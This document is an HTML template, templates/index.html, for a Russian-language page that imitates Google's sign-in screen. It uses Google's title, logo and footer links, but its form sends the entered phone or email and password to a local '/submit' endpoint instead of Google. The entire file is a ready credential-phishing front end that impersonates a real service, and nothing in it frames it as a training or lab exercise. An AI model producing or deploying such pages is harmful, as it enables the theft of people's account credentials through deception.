<!-- templates/index.html -->
<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <title>Вход в Google</title>
    <link rel="stylesheet" href="/static/css/style.css">
    <script src="/static/js/script.js" defer></script>
</head>
<body>
    <div class="logo">
        <img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png" alt="Google Logo">
    </div>
    <div class="login-form">
        <form action="/submit" method="POST">
            <input type="text" name="username" placeholder="Телефон или адрес эл. почты" required>
            <input type="password" name="password" placeholder="Пароль" required>
            <button type="submit">Далее</button>
        </form>
    </div>
    <div class="footer">
        <a href="#">Русский</a>
        <a href="#">Справка</a>
        <a href="#">Конфиденциальность</a>
        <a href="#">Условия</a>
    </div>
</body>
</html>